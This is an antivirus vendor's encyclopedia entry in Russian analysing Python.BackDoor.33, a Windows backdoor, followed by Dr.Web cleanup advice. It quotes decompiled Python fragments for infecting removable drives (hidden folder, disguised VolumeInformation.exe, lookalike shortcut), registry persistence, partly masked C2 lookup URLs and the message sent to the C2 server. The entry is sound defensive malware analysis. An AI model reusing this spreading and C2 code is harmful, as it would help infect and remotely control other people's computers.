Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Python.BackDoor.33

Добавлен в вирусную базу Dr.Web: 2017-10-12

Описание добавлено:

SHA1:

  • 05cae95a3340395e363c2d6bddbc57833dbdb85c

Бэкдор для ОС Windows, написанный на языке Python. Содержит упакованную утилиту py2exe.

Установка

  • Если имя файла не совпадает с 'mscore.exe', создает свою копию в папке All Users\Application Data\NetFramework\ с именем mscore.exe.
  • Регистрирует себя в автозагрузке: если имеются права администратора — в ветви реестра [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run], иначе — в ветви [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run].
  • Завершает выполнение сценария и ожидает перезагрузки системы.

Распространение

  • Пытается заразить съемные носители с именами от C до Z:
    
    for letter in 'CDEFGHIJKLMNOPQRSTUVWXYZ':
                    drive = u'{}:\\'.format(letter)
                    if bitmask & 1 and ctypes.windll.kernel32.GetDriveTypeW(drive) == 2:
                        mounted_letters = subprocess.Popen('wmic logicaldisk where deviceid="%s:" get Size' % letter, startupinfo = startupinfo, stdout = subprocess.PIPE, stderr = subprocess.STDOUT, stdin = subprocess.PIPE)
                        length = mounted_letters.stdout.readlines()[1].strip()
                        if not length.isdigit():
                            continue
                        volume_name_buffer = ctypes.create_unicode_buffer(1024)
                        ctypes.windll.kernel32.GetVolumeInformationW(drive, volume_name_buffer, ctypes.sizeof(volume_name_buffer), None, None, None, None, None)
    
  • Cоздает скрытую директорию:
    
    hidden_folder = os.path.join(drive, unichr(160))
    if not os.path.exists(hidden_folder):
        os.mkdir(hidden_folder)
    ctypes.windll.kernel32.SetFileAttributesW(hidden_folder, 2)
    
  • Сохраняет собственную копию с именем VolumeInformation.exe:
    
    destination_file_path = os.path.join(drive, 'VolumeInformation.exe')
    if not os.path.exists(destination_file_path):
        shutil.copyfile(sys.argv[0], destination_file_path)
        ctypes.windll.kernel32.SetFileAttributesW(destination_file_path, 2)
    
  • В корневой папке диска создает ссылку вида <имя тома>.lnk (либо Removable Disk.lnk), которая ведет на вредоносный исполняемый файл VolumeInformation.exe:
    
    ctypes.windll.kernel32.GetVolumeInformationW(drive, volume_name_buffer, ctypes.sizeof(volume_name_buffer), None, None, None, None, None)
    if len(volume_name_buffer.value) == 0:
        lnk_name = 'Removable Disk'
    else:
        lnk_name = volume_name_buffer.value
    
  • Перемещает файлы, отличные от .lnk, VolumeInformation.exe и .vbs, в ранее созданную скрытую папку:
    
    for content in os.listdir(drive):
        if not content.endswith('.lnk') and not content.endswith('.vbs') and 'VolumeInformation' not in content:
            try:
                shutil.move(os.path.join(drive, content), hidden_folder)
            except:
                continue
    

Взаимодействие с управляющим сервером

Троянец пытается определить IP-адрес и доступный порт управляющего сервера, отправляя запрос к нескольким серверам в Интернете:


url_list = [
    'http://pastebin.com/raw/xf****iX',
    'https://docs.google.com/document/d/1kKwT8qwi********Nw1g65CVDLdphA0qs'
    'http://notes.io/r***H'
]

Если удалось получить IP-адрес и порт, троянец отсылает на управляющий сервер запрос следующего вида:


GLOBAL_SOCKET.sendall(str({
    'mode': 'buildClient',
    'from': 'client',
    'payload': '{}'.format(MODERATOR), # MODERATOR = "UPX"
    'key': '',
    'module_id': '',
    'session_id': '' }) + '[ENDOFMESSAGE]'
)

В ответ с управляющего сервера загружается сценарий на языке Python, детектируемый как Python.BackDoor.35.

Новость о троянце

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке